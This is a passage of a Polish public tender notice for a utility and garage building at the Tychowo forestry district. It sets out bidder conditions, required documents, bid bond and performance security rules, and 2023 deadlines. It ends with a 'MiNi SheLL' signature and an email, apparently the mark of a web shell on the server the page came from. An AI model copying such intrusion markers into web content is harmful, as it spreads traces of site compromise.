występowania w obrocie gospodarczym.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do warunku posiadania uprawnień do<br/>prowadzenia określonej działalności gospodarczej lub zawodowej.<br/>3) sytuacji ekonomicznej lub finansowej<br/>Zamawiający stawia szczególne wymagania w zakresie opisu spełniania warunku udziału w postępowaniu w odniesieniu do<br/>warunku dot. sytuacji ekonomicznej.<br/>Warunek w odniesieniu do sytuacji finansowej zostanie spełniony jeśli Wykonawca wykaże, że posiada środki finansowe lub<br/>zdolność kredytową w kwocie co najmniej 200.000,00 PLN (słownie: dwieście tysięcy złotych 00/100).<br/>4) zdolności technicznej lub zawodowej<br/>7.1.4.1) Warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że wykonał w<br/>ciągu ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie) – robotę budowlaną polegającą na remoncie, przebudowie lub budowie min. 1 budynku o powierzchni zabudowy<br/>min. 100 m2 o wartości robót nie mniejszej niż 200 000,00 zł brutto.<br/>Poprzez sformułowanie przebudowy, budowy, remontu, Zamawiający rozumie definicje zgodne z określonymi w „Ustawie<br/>Prawo budowlane”.<br/>Przez powierzchnię zabudowy rozumie się powierzchnię terenu zajętą przez budynek w stanie wykończonym.<br/>Powierzchnia zabudowy jest wyznaczona przez rzut pionowy zewnętrznych krawędzi budynku na powierzchnię terenu.<br/>7.1.4.2) Warunek ten, w zakresie osób skierowanych do realizacji zamówienia zostanie uznany za spełniony, jeżeli<br/>Wykonawca wykaże, że dysponuje lub będzie dysponował następującymi osobami:<br/>tj. co najmniej jedną osobą , która będzie pełnić funkcję kierownika budowy, posiadającą uprawnienia budowlane do<br/>kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń.<br/>Zamawiający wymaga ponadto od wyżej wymienionej osoby minimum 2-letniego doświadczenia zawodowego (liczone od<br/>dnia uzyskania uprawnień) w kierowaniu robotami budowlanymi w ww. specjalności na stanowisku kierownika budowy, przy<br/>czym zasadą jest, że nakładające się na siebie okresy sprawowania ww. funkcji nie sumują się. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku<br/>podstaw do wykluczenia z postępowania, o których mowa w pkt 6.1., 6.3 i 6.4. oraz w celu potwierdzenia spełniania warunków<br/>udziału w postępowaniu, o których mowa w pkt 7.1 SWZ. Wykonawca składa wraz z ofertą oświadczenia, o których mowa w art. 125<br/>ust. 1 PZP, tj. oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzone zgodnie ze wzorem stanowiącym<br/>załącznik nr 9 do SWZ oraz oświadczenie o braku podstaw do wykluczenia z postępowania, sporządzone zgodne ze wzorem<br/>stanowiącym załącznik nr 8 do SWZ. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w zdaniu poprzednim, także oświadczenie podmiotu udostępniającego<br/>zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu (zgodnie ze wzorem stanowiącym załącznik nr 7 do SWZ) oraz<br/>odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby (zgodnie<br/>ze wzorem stanowiącym załącznik nr 6 do SWZ).<br/>W celu potwierdzenia braku podstaw do wykluczenia, o których mowa w pkt 6.1. i 6.3 Zamawiający przed udzieleniem zamówienia,<br/>działając na podstawie art. 274 ust. 1 PZP wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>a) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5) PZP, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (tekst jedn. Dz. U. z 2021 r. poz. 275), z innym<br/>Wykonawcą, który złożył odrębną ofertę albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej<br/>(wzór oświadczenia Wykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP o przynależności lub braku przynależności do tej grupy<br/>kapitałowej stanowi załącznik nr 5 do SWZ),<br/>b) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4) PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu<br/>potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa w pkt 7.1. Zamawiający przed udzieleniem<br/>zamówienia, działając na podstawie art. 274 ust. 1 PZP wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia<br/>w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>a) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich<br/>5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca<br/>wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane,<br/>*5-letni okres liczony jest wstecz od dnia, w którym upływa termin składania ofert (wzór wykazu robót stanowi załącznik nr 11 do<br/>SWZ),<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót, wykonanych wspólnie z innymi wykonawcami wykaz dotyczy<br/>robót, w których wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/>b) dowodów określających, czy wskazane przez Wykonawcę roboty na potwierdzenie spełnienia warunku udziału w postępowaniu<br/>dot. zdolności technicznej lub zawodowej w zakresie doświadczenia zostały wykonane należycie.<br/>Dowodami, o których mowa powyżej są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty<br/>zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty,<br/>c) wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia niezbędnych do wykonania zadania publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacja o podstawie do dysponowania tymi osobami (wzór wykazu osób skierowanych przez wykonawcę do<br/>realizacji zamówienia stanowi załącznik nr 12 do SWZ) .<br/>d) informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków<br/>finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.<br/>Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez zamawiającego podmiotowych środków<br/>dowodowych, o których mowa w lit. c, Wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający sposób<br/>potwierdzają spełnianie opisanego przez Zamawiającego warunku udziału w postępowaniu dotyczącego sytuacji finansowej</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W terminie składania ofert określonym w pkt13.1.SWZ wykonawca zobowiązany jest złożyć Zamawiającemu Ofertę<br/>zawierającą:<br/>a)formularz Oferty (załącznik nr 1 do SWZ) wraz z kosztorysem ofertowym (sporządzonym wg wzoru stanowiącego<br/>załącznik nr3 do SWZ), sporządzone pod rygorem nieważności, w formie elektronicznej (tj.opatrzonej kwalifikowanym<br/>podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym,<br/>b)oświadczenia, sporządzone pod rygorem nieważności, w formie elektronicznej (tj. opatrzonej kwalifikowanym podpisem<br/>elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osoby/osób<br/>upoważnionych do reprezentacji podmiotu składającego oświadczenie, złożone przez:<br/> Wykonawcę - sporządzone zgodnie ze wzorami stanowiącymi odpowiednio załącznik nr8 i załącznik9 do SWZ,<br/> Wykonawców wspólnie ubiegających się o udzielenie zamówienia -sporządzone zgodnie ze wzorami stanowiącymi<br/>odpowiednio załącznik nr8 i załącznik9 do SWZ,<br/> podmioty trzecie udostępniające Wykonawcy zasoby na zasadzie art.118 ust.1 w zw. z art.266 PZP sporządzone zgodnie<br/>ze wzorami stanowiącymi odpowiednio załącznik nr6 i załącznik7 do SWZ;<br/>c)zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów zgodnie z pkt8.4.SWZ, jeżeli Wykonawca<br/>wykazując spełnienie warunków udziału w postępowaniu polega na zdolnościach lub sytuacji innych podmiotów;<br/>(Niewiążący wzór zobowiązania do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania<br/>zamówienia stanowi załącznik nr4 do SWZ),<br/>d)odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub<br/>innego właściwego rejestru w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy/podmiotu udostępniającego<br/>zasoby jest umocowana do jego reprezentowania. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których<br/>mowa w zdaniu poprzednim, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych,<br/>o ile Wykonawca/podmiot udostępniający zasoby dostarczy dane umożliwiające dostęp do tych dokumentów,<br/>e)pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy/podmiotu<br/>udostępniającego zasoby, jeżeli w imieniu Wykonawcy/podmiotu udostępniającego zasoby działa osoba, której umocowanie do jego reprezentowania nie wynika z innych dokumentów złożonych wraz z ofertą (np. odpisu lub informacji z Krajowego<br/>Rejestru Sądowego,Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru),<br/>sporządzone pod rygorem nieważności,w formie elektronicznej i opatrzone się kwalifikowanym podpisem elektronicznym,<br/>lub w postaci elektronicznej podpisem zaufanym lub podpisem osobistym lub w formie opisanej w pkt8.15 - 8.17 SWZ.<br/>f)pełnomocnictwo lub inny dokument potwierdzający umocowanie dla pełnomocnika ustanowionego przez Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia do reprezentowania ich w postępowaniu albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, jeżeli ofertę składają Wykonawcy wspólnie ubiegający<br/>się o udzielenie zamówienia, sporządzone pod rygorem nieważności, w formie elektronicznej i opatrzone się kwalifikowanym<br/>podpisem elektronicznym, lub w postaci elektronicznej podpisem zaufanym lub podpisem osobistym lub w formie opisanej w<br/>pkt 8.15 – 8.17 SWZ.<br/>g)wadium w oryginale w postaci elektronicznej, opatrzonej kwalifikowanym podpisem elektronicznym osób upoważnionych<br/>do jego wystawienia (tylko, gdy Wykonawca wnosi wadium w formie niepieniężnej)<br/>h)podmiotowy środek dowodowy w postaci oświadczenia, o którym mowa w art. 117 ust. 4 PZP(Zamawiający rekomenduje<br/>wykorzystać oświadczenie znajdujące się w formularzu ofertowym). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w wysokości<br/>7.000,00 zł (słownie: siedem tysięcy złotych 00/100).<br/>Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do dnia upływu terminu<br/>związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP.<br/>10.2. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych, <br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn.: Dz. U. z 2022 r. poz. 2080).<br/>10.3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego w banku BGŻ BNP<br/>PARIBAS nr rachunku: 92 1600 1462 1016 8000 5000 0003 z dopiskiem: wadium na zabezpieczenie oferty w postępowaniu<br/>na „Budowa budynku gospodarczo garażowego przy siedzibie Nadleśnictwa Tychowo”.<br/>Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie zaliczone na rachunku bankowym<br/>Zamawiającego. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>10.4. Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach<br/>udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej<br/>Agencji Rozwoju Przedsiębiorczości powinno wynikać bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez<br/>Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w<br/>okolicznościach określonych w art. 98 ust. 6 PZP.<br/>10.5. Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 10.2. ppkt 2)-4) należy przekazać<br/>Zamawiającemu wraz z Ofertą w oryginale w postaci elektronicznej tj. opatrzonej kwalifikowanym podpisem elektronicznym<br/>osób upoważnionych do jego wystawienia. Wadium musi zabezpieczać ofertę na całość zamówienia przez cały okres<br/>związania ofertą. Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy, lub nie będzie<br/>utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o<br/>którym mowa w art. 98 ust. 2 pkt 3 PZP zostanie odrzucona z postępowania na podstawie art. 226 ust. 1 pkt 14 PZP w zw. z<br/>art. 266 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum):<br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia;<br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi<br/>wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres<br/>umocowania;<br/>3) oświadczenie, o którym mowa w art. 125 ust. 1 PZP składa każdy z wykonawców wspólnie ubiegających się o<br/>zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Ww. oświadczenie<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia powinno zostać złożone wraz z ofertą pod rygorem<br/>nieważności, w formie elektronicznej (tj. opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>4) dokumenty, o których mowa w pkt 8.3. obowiązany będzie złożyć każdy z wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia.<br/>5) dokumenty, o których mowa w pkt 8.2. lit. a, wykonawcy wspólnie ubiegający się o zamówienie składają wspólnie,<br/>natomiast dokumenty, o których mowa w pkt 8.2. lit. b i c składa ten z wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, który wykazuje spełnienie warunku udziału w postępowaniu, do którego wykazania służy dany dokument;<br/>6) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za<br/>wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy;<br/>7) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę kierującego (lidera),<br/>upoważnionego do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla<br/>wszystkich partnerów;<br/>8) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lub od<br/>wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna.<br/>9) Zamawiający informuje o treści przepisu art. 117 ust. 3 PZP, zgodnie z którym w odniesieniu do warunków dotyczących<br/>wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są<br/>wymagane.<br/>W związku z powyższym Wykonawca jest zobowiązany załączyć do oferty podmiotowy środek dowodowy w postaci<br/>oświadczenia, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy. Wzór stosownego<br/>oświadczenia został zawarty w formularzu ofertowym stanowiącym załącznik nr 1 i Zamawiający zaleca złożyć to<br/>oświadczenie właśnie w tym formularzu.<br/>W przypadku Wykonawców wykonujących działalność w formie spółki cywilnej postanowienia dot. oferty Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) stosuje się odpowiednio. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 17.1. Projektowane postanowienia umowy w sprawie zamówienia publicznego zawiera wzór umowy stanowiący załącznik nr<br/>10 do SWZ.<br/>17.2. Umowa zostanie zawarta na podstawie złożonej oferty Wykonawcy. Zamawiający przewiduje możliwość zmian<br/>postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku<br/>wystąpienia co najmniej jednej z okoliczności w niej wymienionych z uwzględnieniem podanych we wzorze umowy<br/>warunków ich wprowadzenia.<br/>Zmiana postanowień zawartej umowy następuje na piśmie pod rygorem nieważności.<br/>Zmiany zostały uwzględnione w załączniku nr 10 do SWZ (§ 11) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem platformy Portal e-USługi SMARTPZP</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-23 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-21</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Przed zawarciem umowy w sprawie zamówienia publicznego, Wykonawca, którego oferta została uznana za<br/>najkorzystniejszą zobowiązany jest dopełnić następujących formalności:<br/>1) wnieść wymagane zabezpieczanie należytego wykonania umowy;<br/>2) przedłożyć Zamawiającemu:<br/>a) polisę ubezpieczeniową zgodną z wymaganiami Zamawiającego, określonymi w projekcie umowy, stanowiącym załącznik<br/>nr 10 do SWZ, w wysokości nie mniejszej niż 300 000,00 zł;.<br/>b) dowód wniesienia zabezpieczenia należytego wykonania umowy w wysokości 3 % ceny ofertowej brutto;<br/>c) środki dowodowe potwierdzające posiadanie wymaganych uprawnień zgodnie z pkt. 7.1.4.2. SWZ.<br/>Niedopełnienie lub nieprzedłożenie któregokolwiek z dokumentów określonych w pkt. 16.1. SWZ traktowane będzie jako<br/>uchylenie się przez Wykonawcę od zawarcia umowy z jego winy.<br/>19.1. Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy przez wykonawcę, którego oferta została uznana za najkorzystniejszą.<br/>19.2. Zabezpieczenie należytego wykonania umowy wynosić będzie: 3 % ceny całkowitej podanej w ofercie brutto.<br/>19.3. Zabezpieczenie może być wnoszone według wyboru Wykonawcy w jednej lub w kilku następujących formach:<br/>1) pieniądzu;<br/>2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy<br/>jest zawsze zobowiązaniem pieniężnym;<br/>3) gwarancjach bankowych;<br/>4) gwarancjach ubezpieczeniowych;<br/>5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>19.4. Zabezpieczenie służy pokryciu roszczeń z tytułu niewykonania lub nienależytego wykonania umowy, w okresie<br/>obowiązywania umowy, jak również roszczeń z tytułu gwarancji jakości oraz rękojmi za wady.<br/>19.5. Warunki i termin zwrotu zabezpieczenia należytego wykonania umowy określone zostały w załączniku nr 10 do SWZ -<br/>Wzorze Umowy.<br/>19.6. Zabezpieczenie wnoszone w pieniądzu Wykonawca wpłaci przed zawarciem Umowy na rachunek bankowy<br/>Zamawiającego o numerze: 92 1600 1462 1016 8000 5000 0003 tytułem: „Zabezpieczenie należytego wykonania umowy na<br/>budowę budynku gospodarczo garażowego przy siedzibie Nadleśnictwa Tychowo”.<br/>19.7. W przypadku wniesienia wadium w pieniądzu Wykonawca może wyrazić zgodę na zaliczenie kwoty wadium na poczet<br/>zabezpieczenia. Dzień wpłynięcia wniosku Wykonawcy o przesunięcie kwoty wadium na poczet zabezpieczenia do<br/>Zamawiającego będzie traktowany, jako dzień wniesienia zabezpieczenia.<br/>19.8. Jeżeli zabezpieczenie wniesiono w pieniądzu, Zamawiający przechowuje je na oprocentowanym rachunku bankowym.<br/>Zamawiający zwraca zabezpieczenie wniesione w pieniądzu z odsetkami wynikającymi z umowy rachunku bankowego, na<br/>którym było ono przechowywane, pomniejszone o koszt prowadzenia tego rachunku oraz prowizji bankowej za przelew<br/>pieniędzy na rachunek bankowy wskazany przez Wykonawcę.

Creat By MiNi SheLL
Email: jattceo@gmail.com